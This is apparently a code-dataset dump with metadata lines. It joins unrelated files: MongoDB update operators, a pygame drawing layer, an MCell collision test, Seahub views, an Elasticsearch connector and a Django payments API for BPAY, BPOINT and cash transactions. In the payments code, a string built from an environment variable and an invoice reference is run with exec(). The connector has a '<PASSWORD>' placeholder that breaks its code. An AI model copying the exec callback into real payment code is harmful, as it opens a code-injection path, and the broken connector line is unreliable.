usage: >>> doc.num = Mul(5) Query: >>> Mul(5)() {'$mul': 5} """ def __call__(self): return '$mul', self.update def apply(self): return self.original_value * self.update class Push(UpdateOperator): """Is used to append a value to a list. Example usage: >>> doc.num_list = Push(5) Query: >>> Push(5)() {'$push': 5} """ def __call__(self): return '$push', self.update def apply(self): return self.original_value.append(self.update) class Pull(UpdateOperator): """Is used to pull all entries that match the given value. Example usage: >>> doc.num_list = Pull(5) Query: >>> Pull(5)() {'$pull': 5} """ def __call__(self): return '$pull', self.update def apply(self): return [ val for val in self.original_value if val != self.update ] class PullAll(UpdateOperator): """Is used to pull all entries that match a value from a list. Example usage: >>> doc.num_list = PullAll([5, 6, 7]) Query: >>> PullAll([5, 6, 7])() {'$pullAll': [5, 6, 7]} """ def __call__(self): return '$pullAll', self.update def apply(self): return [ val for val in self.original_value if val not in self.update ]
<filename>motorturbine/updateset.py def to_operator(current, new_value): is_operator = isinstance(new_value, UpdateOperator) is_set = isinstance(new_value, Set) if is_operator: if not is_set and current is None: raise Exception('Cant use operator on None') else: new_value = Set(new_value) return new_value class UpdateOperator(object): """UpdateOperators can be used to automatically generate update queries that are understood by mongo. Each of the operators can be used as defined in the mongo manual as they're just a direct mapping. """ def __init__(self, update): super().__init__() self.update = update def set_original_value(self, value): self.original_value = value class Set(UpdateOperator): """Is used to set the specified field to any given value. Not using it is the default case and functionally the same as just leaving out an UpdateOperator completely. Example usage: >>> doc.num = 5 >>> doc.num = Set(5) Query: >>> Set(5)() {'$set': 5} """ def __call__(self): return '$set', self.update def apply(self): return self.update class Unset(UpdateOperator): """Is used to remove an entry from a list or dict. Example usage: >>> del doc.map['test'] >>> doc.map = Unset('test') Query: >>> Unset('test')() {'$unset': 'test'} """ def __call__(self): return '$unset', self.update def apply(self): return self.update class Inc(UpdateOperator): """Is used to modify a numeric value by a given amount. Example usage: >>> doc.num = Inc(5) >>> doc.num = Inc(-5) Query: >>> Inc(5)() {'$inc': 5} """ def __call__(self): return '$inc', self.update def apply(self): return self.original_value + self.update class Dec(UpdateOperator): """Is used to decrease a numeric value. Example usage: >>> doc.num = Dec(5) Query: >>> Dec(5)() {'$inc': -5} """ def __call__(self): return '$inc', -self.update def apply(self): return self.original_value - self.update class Max(UpdateOperator): """Update the field to the maximum of database and current value. Example usage: >>> doc.num = Max(5) Query: >>> Max(5)() {'$max': 5} """ def __call__(self): return '$max', self.update def apply(self): return max(self.original_value, self.update) class Min(UpdateOperator): """Update the field to the minimum of database and current value. Example usage: >>> doc.num = Min(5) Query: >>> Min(5)() {'$min': 5} """ def __call__(self): return '$min', self.update def apply(self): return min(self.original_value, self.update) class Mul(UpdateOperator): """Is used to multipy a numeric value by a given amount. Example usage: >>> doc.num = Mul(5) Query: >>> Mul(5)() {'$mul': 5} """ def __call__(self): return '$mul', self.update def apply(self): return self.original_value * self.update class Push(UpdateOperator): """Is used to append a value to a list. Example usage: >>> doc.num_list = Push(5) Query: >>> Push(5)() {'$push': 5} """ def __call__(self): return '$push', self.update def apply(self): return self.original_value.append(self.update) class Pull(UpdateOperator): """Is used to pull all entries that match the given value. Example usage: >>> doc.num_list = Pull(5) Query: >>> Pull(5)() {'$pull': 5} """ def __call__(self): return '$pull', self.update def apply(self): return [ val for val in self.original_value if val != self.update ] class PullAll(UpdateOperator): """Is used to pull all entries that match a value from a list. Example usage: >>> doc.num_list = PullAll([5, 6, 7]) Query: >>> PullAll([5, 6, 7])() {'$pullAll': [5, 6, 7]} """ def __call__(self): return '$pullAll', self.update def apply(self): return [ val for val in self.original_value if val not in self.update ]
en
0.629647
UpdateOperators can be used to automatically generate update queries that are understood by mongo. Each of the operators can be used as defined in the mongo manual as they're just a direct mapping. Is used to set the specified field to any given value. Not using it is the default case and functionally the same as just leaving out an UpdateOperator completely. Example usage: >>> doc.num = 5 >>> doc.num = Set(5) Query: >>> Set(5)() {'$set': 5} Is used to remove an entry from a list or dict. Example usage: >>> del doc.map['test'] >>> doc.map = Unset('test') Query: >>> Unset('test')() {'$unset': 'test'} Is used to modify a numeric value by a given amount. Example usage: >>> doc.num = Inc(5) >>> doc.num = Inc(-5) Query: >>> Inc(5)() {'$inc': 5} Is used to decrease a numeric value. Example usage: >>> doc.num = Dec(5) Query: >>> Dec(5)() {'$inc': -5} Update the field to the maximum of database and current value. Example usage: >>> doc.num = Max(5) Query: >>> Max(5)() {'$max': 5} Update the field to the minimum of database and current value. Example usage: >>> doc.num = Min(5) Query: >>> Min(5)() {'$min': 5} Is used to multipy a numeric value by a given amount. Example usage: >>> doc.num = Mul(5) Query: >>> Mul(5)() {'$mul': 5} Is used to append a value to a list. Example usage: >>> doc.num_list = Push(5) Query: >>> Push(5)() {'$push': 5} Is used to pull all entries that match the given value. Example usage: >>> doc.num_list = Pull(5) Query: >>> Pull(5)() {'$pull': 5} Is used to pull all entries that match a value from a list. Example usage: >>> doc.num_list = PullAll([5, 6, 7]) Query: >>> PullAll([5, 6, 7])() {'$pullAll': [5, 6, 7]}
3.702328
4
layers/drawing.py
MEDVEDx64/Graphone
0
6629037
<filename>layers/drawing.py from . import base from . import interactive from pygame import gfxdraw, display from utils.data import DataContainer class Drawing(list, DataContainer): def __init__(self): super(Drawing, self).__init__() self.color = (255, 255, 255) def prefix(self): return 'drawing' class ShapeLayer(base.InteractiveLayer): def __init__(self, app, parent=None): super(ShapeLayer, self).__init__(app) self.parent = parent class LineShapeLayer(ShapeLayer, interactive.DraggableVertexLayer): def __init__(self, app, parent=None): super(LineShapeLayer, self).__init__(app, parent) def render(self): super(LineShapeLayer, self).render() screen = display.get_surface() color = (255, 255, 255) if self.parent: color = self.parent.color gfxdraw.line(screen, self.x + self.app.context.offset_x, self.y + self.app.context.offset_y, self.x2 + self.app.context.offset_x, self.y2 + self.app.context.offset_y, color)
<filename>layers/drawing.py from . import base from . import interactive from pygame import gfxdraw, display from utils.data import DataContainer class Drawing(list, DataContainer): def __init__(self): super(Drawing, self).__init__() self.color = (255, 255, 255) def prefix(self): return 'drawing' class ShapeLayer(base.InteractiveLayer): def __init__(self, app, parent=None): super(ShapeLayer, self).__init__(app) self.parent = parent class LineShapeLayer(ShapeLayer, interactive.DraggableVertexLayer): def __init__(self, app, parent=None): super(LineShapeLayer, self).__init__(app, parent) def render(self): super(LineShapeLayer, self).render() screen = display.get_surface() color = (255, 255, 255) if self.parent: color = self.parent.color gfxdraw.line(screen, self.x + self.app.context.offset_x, self.y + self.app.context.offset_y, self.x2 + self.app.context.offset_x, self.y2 + self.app.context.offset_y, color)
none
1
2.782963
3
tests/pymcell4_positive/1515_tetrahedron_box_collision_moving_3_w_wall_wall_hit/model.py
mcellteam/mcell-tests
1
6629038
#!/usr/bin/env python3 import sys import os import copy import numpy as np MCELL_PATH = os.environ.get('MCELL_PATH', '') if MCELL_PATH: sys.path.append(os.path.join(MCELL_PATH, 'lib')) else: print("Error: variable MCELL_PATH that is used to find the mcell library was not set.") sys.exit(1) import mcell as m ITERATIONS = 10 from geometry import * from observables import * model = m.Model() model.add_observables(observables) # TODO viz in cellblender without any molecules does not work yet a = m.Species( name = 'a', diffusion_constant_3d = 0 ) model.add_species(a) rel = m.ReleaseSite( name = 'rel', complex = a, shape = m.Shape.SPHERICAL, location = (0, 0, 0), site_diameter = 0, number_to_release = 1 ) model.add_release_site(rel) Tetrahedron.translate((-0.2, 0, 0)) model.add_geometry_object(Tetrahedron) Box = m.geometry_utils.create_box( 'Box', 0.2 ) model.add_geometry_object(Box) model.config.total_iterations = ITERATIONS model.initialize() def print_wall_hit_info(wall_wall_hits): for info in wall_wall_hits: print(info.wall1.geometry_object.name + ":" + str(info.wall1.wall_index) + " - " + info.wall2.geometry_object.name + ":" + str(info.wall2.wall_index)) for i in range(ITERATIONS + 1): model.export_viz_data_model() for k in range(len(Tetrahedron_vertex_list) - 1): # not moving with the last vertex model.add_vertex_move(Tetrahedron, k, (0.02, 0, 0)) wall_wall_hits = model.apply_vertex_moves(collect_wall_wall_hits=True, randomize_order=False) print_wall_hit_info(wall_wall_hits) if i == 3: assert len(wall_wall_hits) == 3 # checking depends on Tetrahedron having internal object id 0 and Box id 1 assert wall_wall_hits[2].wall1.geometry_object is Tetrahedron assert wall_wall_hits[2].wall1.wall_index == 3 assert wall_wall_hits[2].wall2.geometry_object == Box assert wall_wall_hits[2].wall2.wall_index == 0 model.run_iterations(1) model.end_simulation()
#!/usr/bin/env python3 import sys import os import copy import numpy as np MCELL_PATH = os.environ.get('MCELL_PATH', '') if MCELL_PATH: sys.path.append(os.path.join(MCELL_PATH, 'lib')) else: print("Error: variable MCELL_PATH that is used to find the mcell library was not set.") sys.exit(1) import mcell as m ITERATIONS = 10 from geometry import * from observables import * model = m.Model() model.add_observables(observables) # TODO viz in cellblender without any molecules does not work yet a = m.Species( name = 'a', diffusion_constant_3d = 0 ) model.add_species(a) rel = m.ReleaseSite( name = 'rel', complex = a, shape = m.Shape.SPHERICAL, location = (0, 0, 0), site_diameter = 0, number_to_release = 1 ) model.add_release_site(rel) Tetrahedron.translate((-0.2, 0, 0)) model.add_geometry_object(Tetrahedron) Box = m.geometry_utils.create_box( 'Box', 0.2 ) model.add_geometry_object(Box) model.config.total_iterations = ITERATIONS model.initialize() def print_wall_hit_info(wall_wall_hits): for info in wall_wall_hits: print(info.wall1.geometry_object.name + ":" + str(info.wall1.wall_index) + " - " + info.wall2.geometry_object.name + ":" + str(info.wall2.wall_index)) for i in range(ITERATIONS + 1): model.export_viz_data_model() for k in range(len(Tetrahedron_vertex_list) - 1): # not moving with the last vertex model.add_vertex_move(Tetrahedron, k, (0.02, 0, 0)) wall_wall_hits = model.apply_vertex_moves(collect_wall_wall_hits=True, randomize_order=False) print_wall_hit_info(wall_wall_hits) if i == 3: assert len(wall_wall_hits) == 3 # checking depends on Tetrahedron having internal object id 0 and Box id 1 assert wall_wall_hits[2].wall1.geometry_object is Tetrahedron assert wall_wall_hits[2].wall1.wall_index == 3 assert wall_wall_hits[2].wall2.geometry_object == Box assert wall_wall_hits[2].wall2.wall_index == 0 model.run_iterations(1) model.end_simulation()
en
0.782162
#!/usr/bin/env python3 # TODO viz in cellblender without any molecules does not work yet # not moving with the last vertex # checking depends on Tetrahedron having internal object id 0 and Box id 1
1.968094
2
seahub/options/views.py
saukrIppl/newsea
2
6629039
<gh_stars>1-10 # -*- coding: utf-8 -*- from django.http import HttpResponse, HttpResponseBadRequest, \ HttpResponseRedirect , Http404 from django.views.decorators.http import require_POST from django.contrib import messages from django.utils.translation import ugettext as _ from seahub.auth.decorators import login_required from seahub.options.models import UserOptions from seahub.utils import is_pro_version from seahub.settings import SITE_ROOT @login_required @require_POST def save_options(request): """ """ username = request.user.username repo_enc = request.POST.get('repo-enc', '') server_crypto = True if repo_enc.startswith('server') else False if server_crypto: UserOptions.objects.enable_server_crypto(username) else: UserOptions.objects.disable_server_crypto(username) next = request.META.get('HTTP_REFERER', None) if next is None: next = SITE_ROOT return HttpResponseRedirect(next) @login_required @require_POST def sub_lib_enable_set(request): """ """ if is_pro_version(): raise Http404 username = request.user.username enable_sub_lib = request.POST.get('enable-sub-lib', '') if enable_sub_lib: UserOptions.objects.enable_sub_lib(username) else: UserOptions.objects.disable_sub_lib(username) next = request.META.get('HTTP_REFERER', None) if next is None: next = SITE_ROOT return HttpResponseRedirect(next)
# -*- coding: utf-8 -*- from django.http import HttpResponse, HttpResponseBadRequest, \ HttpResponseRedirect , Http404 from django.views.decorators.http import require_POST from django.contrib import messages from django.utils.translation import ugettext as _ from seahub.auth.decorators import login_required from seahub.options.models import UserOptions from seahub.utils import is_pro_version from seahub.settings import SITE_ROOT @login_required @require_POST def save_options(request): """ """ username = request.user.username repo_enc = request.POST.get('repo-enc', '') server_crypto = True if repo_enc.startswith('server') else False if server_crypto: UserOptions.objects.enable_server_crypto(username) else: UserOptions.objects.disable_server_crypto(username) next = request.META.get('HTTP_REFERER', None) if next is None: next = SITE_ROOT return HttpResponseRedirect(next) @login_required @require_POST def sub_lib_enable_set(request): """ """ if is_pro_version(): raise Http404 username = request.user.username enable_sub_lib = request.POST.get('enable-sub-lib', '') if enable_sub_lib: UserOptions.objects.enable_sub_lib(username) else: UserOptions.objects.disable_sub_lib(username) next = request.META.get('HTTP_REFERER', None) if next is None: next = SITE_ROOT return HttpResponseRedirect(next)
en
0.769321
# -*- coding: utf-8 -*-
2.004739
2
demo/person/project/infrastructure/drivers/elasticsearch/connector.py
giovannifarlley/ms--fastapi-template
24
6629040
<gh_stars>10-100 from elasticsearch import Elasticsearch from project.infrastructure.environments.loader import Configs from project.infrastructure.monitoring_layer.aplication_general_log import Log from project.infrastructure.monitoring_layer.aplication_kpi import Monitor import sys log = Log() class Elk(object): def __init__(self) -> None: """ Na inicialização da classe de conexão com o elasticsearch, as configurações de ambiente são carregadas em tempo de execução, e servidas sob o contexto da instancia. """ self.elasticsearch_config = Configs.get_by_key("elk") def client(self) -> Elasticsearch: """ Cria uma conexão com o elasticsearch Raises: error: Exception Returns: Elasticsearch """ try: hosts = self.elasticsearch_config["hosts"] username = self.elasticsearch_config["username"] password = <PASSWORD>["password"] client = Elasticsearch( hosts=hosts, http_auth=(username, password) ) return client except Exception as error: log.record.error( "ELK connection error, check your server and credentials", exc_info=sys.exc_info() ) Monitor.send_kpi_message("elk client error") raise error
from elasticsearch import Elasticsearch from project.infrastructure.environments.loader import Configs from project.infrastructure.monitoring_layer.aplication_general_log import Log from project.infrastructure.monitoring_layer.aplication_kpi import Monitor import sys log = Log() class Elk(object): def __init__(self) -> None: """ Na inicialização da classe de conexão com o elasticsearch, as configurações de ambiente são carregadas em tempo de execução, e servidas sob o contexto da instancia. """ self.elasticsearch_config = Configs.get_by_key("elk") def client(self) -> Elasticsearch: """ Cria uma conexão com o elasticsearch Raises: error: Exception Returns: Elasticsearch """ try: hosts = self.elasticsearch_config["hosts"] username = self.elasticsearch_config["username"] password = <PASSWORD>["password"] client = Elasticsearch( hosts=hosts, http_auth=(username, password) ) return client except Exception as error: log.record.error( "ELK connection error, check your server and credentials", exc_info=sys.exc_info() ) Monitor.send_kpi_message("elk client error") raise error
pt
0.980697
Na inicialização da classe de conexão com o elasticsearch, as configurações de ambiente são carregadas em tempo de execução, e servidas sob o contexto da instancia. Cria uma conexão com o elasticsearch Raises: error: Exception Returns: Elasticsearch
2.561241
3
ledger/payments/api.py
jawaidm/ledger
1
6629041
import json from django.db import transaction from django.conf import settings from django.http import HttpResponse, HttpResponseRedirect from django.template.loader import get_template from django.core.exceptions import ValidationError from django.core.urlresolvers import reverse from wsgiref.util import FileWrapper from rest_framework import viewsets, serializers, status, generics, views from rest_framework.renderers import JSONRenderer from rest_framework.response import Response from rest_framework.authentication import SessionAuthentication from rest_framework.permissions import IsAuthenticated from rest_framework.decorators import list_route,detail_route from ledger.payments.bpay.models import BpayTransaction, BpayFile, BpayCollection from ledger.payments.invoice.models import Invoice, InvoiceBPAY from ledger.payments.bpoint.models import BpointTransaction, BpointToken from ledger.payments.cash.models import CashTransaction, Region, District, DISTRICT_CHOICES, REGION_CHOICES from ledger.payments.models import TrackRefund from ledger.payments.utils import systemid_check, update_payments from ledger.payments.facade import bpoint_facade from ledger.payments.reports import generate_items_csv, generate_trans_csv, generate_items_csv_allocated from ledger.payments.emails import send_refund_email from ledger.accounts.models import EmailUser from oscar.apps.order.models import Order from oscar.apps.payment import forms from confy import env import traceback import six class CsrfExemptSessionAuthentication(SessionAuthentication): def enforce_csrf(self, request): return ####################################################### # # # BPAY # # # ####################################################### class BpayTransactionSerializer(serializers.ModelSerializer): type = serializers.SerializerMethodField() payment_instruction = serializers.SerializerMethodField() payment_method = serializers.SerializerMethodField() entry_method = serializers.SerializerMethodField() created = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S') payment_date = serializers.DateTimeField(source='p_date', format='%Y-%m-%d %H:%M:%S') reason_for_refund_or_reversal = serializers.SerializerMethodField() class Meta: model = BpayTransaction fields = ( "id", "created", "amount", "type", "cheque_num", "crn", "txn_ref", "service_code", "payment_instruction", "payment_method", "payment_date", "entry_method", "orig_ref_num", "reason_for_refund_or_reversal", "discretionary_data", "payer_name", "country", "state", "car", "discount_ref", "discount_method", "approved", "matched", "linked", "biller_code" ) def get_type(self, obj): return dict(BpayTransaction.TRANSACTION_TYPE).get(obj.type) def get_payment_instruction(self, obj): return dict(BpayTransaction.PAYMENT_INSTRUCTION_CODES).get(obj.p_instruction_code) def get_payment_method(self, obj): return dict(BpayTransaction.PAYMENT_METHOD_CODES).get(obj.p_method_code) def get_entry_method(self, obj): return dict(BpayTransaction.ENTRY_METHODS).get(obj.entry_method) def get_reason_for_refund_or_reversal(self, obj): return dict(BpayTransaction.REF_REV_CODE).get(obj.ref_rev_code) class BpayTransactionViewSet(viewsets.ReadOnlyModelViewSet): queryset = BpayTransaction.objects.all() serializer_class = BpayTransactionSerializer renderer_classes = (JSONRenderer,) search_fields = ( '=crn', ) def list(self, request, *args, **kwargs): queryset = self.get_queryset() sorting = request.GET.get('sorting',None) if sorting and sorting.lower() == 'unmatched': queryset = [q for q in queryset if not q.matched] serializer = self.get_serializer(queryset,many=True) return Response(serializer.data) class BpayFileSerializer(serializers.ModelSerializer): #date_modifier = serializers.SerializerMethodField() transactions = BpayTransactionSerializer(many=True) created = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S') #settled = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S') class Meta: model = BpayFile fields = ( "id", "inserted", "created", "file_id", #"settled", #"date_modifier", #"credit_items", #"credit_amount", #"cheque_items", #"cheque_amount", #"debit_amount", #"debit_items", #"account_total", #"account_records", #"group_total", #"group_accounts", #"group_records", #"file_total", #"file_groups", #"file_records", "transactions" ) def get_date_modifier(self, obj): return dict(BpayFile.DATE_MODIFIERS).get(obj.date_modifier) class BpayCollectionSerializer(serializers.ModelSerializer): created = serializers.DateField(source='date') number_of_files = serializers.IntegerField(source='count') class Meta: model = BpayCollection fields = ( 'created', 'number_of_files', 'credit_total', 'cheque_total', 'debit_total', 'total' ) def __init__(self,*args,**kwargs): try: txn_only = kwargs.pop("txns_only") except: txn_only = False super(BpayCollectionSerializer,self).__init__(*args, **kwargs) if txn_only: self.fields['transactions'] = BpayTransactionSerializer(many=True,read_only=True) else: self.fields['files'] = BpayFileSerializer(many=True) class BpayCollectionViewSet(viewsets.ReadOnlyModelViewSet): queryset = BpayCollection.objects.all() serializer_class = BpayCollectionSerializer renderer_classes = (JSONRenderer,) lookup_field = 'created' def retrieve(self, request, created=None, format=None): try: instance = BpayCollection.objects.get(date=created) txns_only = bool(request.GET.get('transactions',False)) serializer = BpayCollectionSerializer(instance,txns_only=txns_only) return Response(serializer.data) except serializers.ValidationError: raise except Exception as e: raise serializers.ValidationError(str(e)) class BpayFileList(viewsets.ReadOnlyModelViewSet): queryset = BpayFile.objects.all() serializer_class = BpayFileSerializer renderer_classes = (JSONRenderer,) ####################################################### # # # /BPAY # # # ####################################################### ####################################################### # # # BPOINT # # # ####################################################### class BpointTransactionSerializer(serializers.ModelSerializer): order = serializers.CharField(source='order.number') cardtype = serializers.SerializerMethodField() settlement_date = serializers.DateField(format='%B, %d %Y') source = serializers.CharField(source='type') crn = serializers.CharField(source='crn1') last_digits = serializers.SerializerMethodField() def get_cardtype(self, obj): return dict(BpointTransaction.CARD_TYPES).get(obj.cardtype) def get_last_digits(self,obj): return obj.last_digits class Meta: model = BpointTransaction fields = ( 'id', 'action', 'crn', 'source', 'amount', 'amount_surcharge', 'cardtype', 'order', 'txn_number', 'original_txn', 'receipt_number', 'response_code', 'response_txt', 'processed', 'settlement_date', 'approved', 'last_digits', 'refundable_amount' ) class AmountSerializer(serializers.Serializer): amount = serializers.DecimalField(max_digits=12, decimal_places=2) details = serializers.CharField(trim_whitespace=True) class BpointTransactionViewSet(viewsets.ModelViewSet): queryset = BpointTransaction.objects.all() serializer_class = BpointTransactionSerializer renderer_classes = (JSONRenderer,) def create(self,request): pass @detail_route(methods=['POST']) def refund(self,request,*args,**kwargs): try: http_status = status.HTTP_200_OK instance = self.get_object() serializer = AmountSerializer(data=request.data) serializer.is_valid(raise_exception=True) refund = instance.refund(serializer.validated_data,request.user) invoice = Invoice.objects.get(reference=instance.crn1) update_payments(invoice.reference) serializer = BpointTransactionSerializer(refund) return Response(serializer.data,status=http_status) except serializers.ValidationError: traceback.print_exc() raise except Exception as e: traceback.print_exc() raise serializers.ValidationError(str(e)) class CardSerializer(serializers.Serializer): cardholdername = serializers.CharField(required=False,max_length=50) number = serializers.CharField(min_length=13,max_length=16) cvn = serializers.CharField(min_length=3,max_length=4) expiry = serializers.DateField(input_formats=['%m%Y',]) class BpointPaymentSerializer(serializers.Serializer): invoice = serializers.CharField(max_length=50) amount = serializers.DecimalField(max_digits=12, decimal_places=2,required=False) card = CardSerializer(required=False) using_token = serializers.BooleanField(default=False) token = serializers.CharField(max_length=16, required=False) original_txn = serializers.CharField(max_length=50,required=False) action = serializers.ChoiceField(choices=BpointTransaction.ACTION_TYPES, default='payment') subtype = serializers.ChoiceField(choices=BpointTransaction.SUB_TYPES,default='single') type = serializers.ChoiceField(choices=BpointTransaction.TRANSACTION_TYPES) def validate(self, data): if data.get('using_token') and data.get('token') and data.get('card'): raise serializers.ValidationError("You can only use one method to make payments ie 'card' or 'token'.") if data['action'] in ['payment','preauth','unmatched_refund'] and not data.get('using_token') and not data.get('card'): raise serializers.ValidationError("For the selected action you need to provide 'card' details.") if data['action'] in ['payment','preauth','unmatched_refund'] and data.get('using_token') and not data.get('token'): raise serializers.ValidationError("You need to supply a stored card token if you are paying using the token.") if data['action'] in ['refund','capture','reversal'] and not data.get('original_txn'): raise serializers.ValidationError("For the selected action you need to provide the transaction number of the transaction matched to this one.") return data class BpointPaymentCreateView(generics.CreateAPIView): ''' Used to create a card point using the api: Example of json request using new card: { "invoice": "1000025", "amount": 1, "action": "payment", "type": "internet", "card": { "number": "4444333322221111", "cvn": "123", "expiry": "052017" } } Example of json request using stored card: { "invoice": "1000025", "amount": 1, "action": "payment", "type": "internet", "using_token": "true", "token": "<token_id" } } ''' serializer_class = BpointPaymentSerializer renderer_classes = (JSONRenderer,) class Bankcard(object): def __init__(self,number,cvn,expiry,name=None): self.name = name self.number = number self.cvn = cvn self.expiry = expiry def create(self, request): try: http_status = status.HTTP_200_OK #parse and validate data serializer = BpointPaymentSerializer(data=request.data) serializer.is_valid(raise_exception=True) txn,res,card, invoice_number, total,original_txn, reference = None, None, None, None, None, None, None # Get the optional paramters for the transaction if serializer.validated_data.get('amount'): total = serializer.validated_data['amount'] if serializer.validated_data.get('original_txn'): original_txn = serializer.validated_data['original_txn'] #Get card details if it is there if serializer.validated_data.get('card'): card_data = serializer.validated_data['card'] card = self.Bankcard( card_data.get('number'), card_data.get('cvn'), card_data.get('expiry').strftime("%m%Y") ) # Check if the invoice exists if action is payment,preauth try: inv = Invoice.objects.get(reference=serializer.validated_data['invoice']) reference = inv.reference except Invoice.DoesNotExist: raise serializers.ValidationError("The invoice doesn't exist.") if not total and serializer.validated_data['action'] in ['payment','preauth','unmatched_refund']: total = inv.amount # intialize the bpoint facade object facade = bpoint_facade if card: # Create card form data form_data = { 'expiry_month_0': card.expiry[:2], 'expiry_month_1': card.expiry[2:], 'ccv': card.cvn, 'number': card.number } # Validate card data using BankcardForm from oscar payments bankcard_form = forms.BankcardForm(form_data) if not bankcard_form.is_valid(): errors = bankcard_form.errors for e in errors: raise serializers.ValidationError(errors.get(e)[0]) txn = facade.post_transaction( serializer.validated_data['action'], serializer.validated_data['type'], serializer.validated_data['subtype'], inv.order_number, reference, total, bankcard_form.bankcard, original_txn ) elif serializer.validated_data.get('using_token'): # Get the token try: token = BpointToken.objects.get(id=serializer.validated_data.get('token')) except BpointToken.DoesNotExist: raise serializers.ValidationError("The selected stored card doesn't exist.") txn = facade.pay_with_storedtoken( serializer.validated_data['action'], serializer.validated_data['type'], serializer.validated_data['subtype'], serializer.validated_data.get('token'), inv.order_number, reference, total, original_txn ) res = BpointTransactionSerializer(BpointTransaction.objects.get(txn_number=txn.txn_number)) return Response(res.data) except serializers.ValidationError: raise except Exception as e: raise serializers.ValidationError(str(e)) ####################################################### # # # /BPOINT # # # ####################################################### ####################################################### # # # CASH # # # ####################################################### class CashSerializer(serializers.ModelSerializer): original_txn = serializers.CharField(required=False) amount = serializers.DecimalField(max_digits=12, decimal_places=2,required=False) details = serializers.CharField(allow_null=True,allow_blank=True,required=False) invoice = serializers.CharField(source='invoice.reference') external = serializers.BooleanField(default=False) region = serializers.CharField(required=False) district = serializers.CharField(required=False) class Meta: model = CashTransaction fields = ( 'invoice', 'amount', 'source', 'created', 'type', 'external', 'region', 'district', 'receipt', 'original_txn', 'details' ) def validate(self,data): if data['external'] and not (data.get('region') or data.get('district')): raise serializers.ValidationError('A region/district must be specified for an external payment.') if data['type'] == 'refund' and not data['details']: raise serializers.ValidationError('details are required for a refund') return data class CashViewSet(viewsets.ModelViewSet): '''Used to create a cash payment using the api: Example of json request: { "invoice": "1000025", "amount": 1, "details" : "refund details" "type": "payment" "source": "cash" } ''' queryset = CashTransaction.objects.all() serializer_class = CashSerializer def create(self,request,format=None): try: http_status = status.HTTP_200_OK #parse and validate data serializer = CashSerializer(data=request.data) serializer.is_valid(raise_exception=True) invoice,txn = None, None #Check if the invoice being paid for exists # Check if the invoice exists if action is payment,preauth try: invoice = Invoice.objects.get(reference=serializer.validated_data['invoice']['reference']) serializer.validated_data['invoice'] = invoice except Invoice.DoesNotExist: raise serializers.ValidationError("The invoice doesn't exist.") # Check if the amount was specified otherwise pay the whole amount if not serializer.validated_data.get('amount'): serializer.validated_data['amount'] = invoice.amount with transaction.atomic(): txn = serializer.save() if txn.type == 'refund': TrackRefund.objects.create(user=request.user,type=1,refund_id=txn.id,details=serializer.validated_data['details']) send_refund_email(invoice,'manual',txn.amount) update_payments(invoice.reference) LEDGER_INVOICE_TRANSACTION_CALLBACK_MODULE =env('LEDGER_INVOICE_TRANSACTION_CALLBACK_MODULE', '') if len(LEDGER_INVOICE_TRANSACTION_CALLBACK_MODULE) != 0: try: ltc = LEDGER_INVOICE_TRANSACTION_CALLBACK_MODULE.split(":") exec('import '+str(ltc[0])) exec(ltc[1]+"('"+invoice.reference+"')") except Exception as e: print (e) http_status = status.HTTP_201_CREATED serializer = CashSerializer(txn) return Response(serializer.data,status=http_status) except serializers.ValidationError: raise except ValidationError as e: raise serializers.ValidationError(str(''.join(e.error_dict.values()[0][0]))) except Exception as e: raise serializers.ValidationError(str(e[0])) class DistrictSerializer(serializers.ModelSerializer): name = serializers.SerializerMethodField() code = serializers.CharField(source='name') class Meta: model = District fields = ('name','code') def get_name(self, obj): return dict(DISTRICT_CHOICES).get(obj.name) class RegionSerializer(serializers.ModelSerializer): districts = DistrictSerializer(many=True) name = serializers.SerializerMethodField() code = serializers.CharField(source='name') class Meta: model = Region fields = ( 'name', 'code', 'districts' ) def get_name(self, obj): return dict(REGION_CHOICES).get(obj.name) class RegionViewSet(viewsets.ReadOnlyModelViewSet): queryset = Region.objects.all() serializer_class = RegionSerializer lookup_field = 'name' ####################################################### # # # /CASH # # # ####################################################### ####################################################### # # # INVOICE # # # ####################################################### class InvoiceTransactionSerializer(serializers.ModelSerializer): cash_transactions=CashSerializer(many=True) bpay_transactions=BpayTransactionSerializer(many=True) bpoint_transactions=BpointTransactionSerializer(many=True) created = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S') owner = serializers.CharField(source='owner.email') refundable_cards=BpointTransactionSerializer(many=True) class Meta: model = Invoice fields = ( 'id', 'owner', 'voided', 'order_number', 'num_items', 'amount', 'reference', 'created', 'balance', 'refundable', 'refundable_amount', 'single_card_payment', 'payment_amount', 'payment_status', 'cash_transactions', 'bpay_transactions', 'bpoint_transactions', 'refundable_cards' ) read_only_fields=( 'created', 'id', 'num_items' ) class BpayLinkSerializer(serializers.Serializer): bpay = serializers.IntegerField() link = serializers.BooleanField(default=True) def validate_bpay(self,val): try: BpayTransaction.objects.get(id=val) except BpayTransaction.DoesNotExist: raise serializers.ValidationError('The bpay transaction entered does not exist.') return val class InvoiceTransactionViewSet(viewsets.ModelViewSet): queryset = Invoice.objects.all() serializer_class = InvoiceTransactionSerializer lookup_field = 'reference' @detail_route(methods=['get']) def linked_bpay(self, request, *args, **kwargs): try: invoice = self.get_object() # Get all linked bpay transactions linked = InvoiceBPAY.objects.filter(invoice=invoice).values('bpay') txns = BpayTransaction.objects.filter(id__in=linked) serializer = BpayTransactionSerializer(txns, many=True) return Response(serializer.data) except serializers.ValidationError: raise except Exception as e: raise serializers.ValidationError(e) @detail_route(methods=['get']) def payments(self, request, *args, **kwargs): try: invoice = self.get_object() # Get all linked bpay transactions payments = [] #cash cash = invoice.cash_transactions.all() for c in cash: payments.append( { 'date':c.created.strftime('%d/%m/%Y'), 'type':c.get_source_display().lower().title() if c.type != 'refund' else 'Manual', 'details':"{}{}".format(c.get_type_display().lower().title(),": {}".format(c.details) if c.details else ''), 'amount':'$ {}'.format(c.amount) if c.type not in ['refund','move_out'] else '$ -{}'.format(c.amount) }) #bpay bpay = invoice.bpay_transactions for b in bpay: payments.append( { 'date':b.p_date.strftime('%d/%m/%Y'), 'type': 'Bpay', 'details':b.get_p_instruction_code_display().lower().title(), 'amount':'$ {}'.format(b.amount) } ) #bpoint bpoint = invoice.bpoint_transactions.filter(response_code=0) for b in bpoint: payments.append( { 'date':b.processed.strftime('%d/%m/%Y'), 'type': 'Credit Card', 'details':b.get_action_display().lower().title(), 'amount':'$ {}'.format(b.amount) if b.action != 'refund' else '$ -{}'.format(b.amount) } ) return Response(payments) except serializers.ValidationError: traceback.print_exc() raise except Exception as e: traceback.print_exc() raise 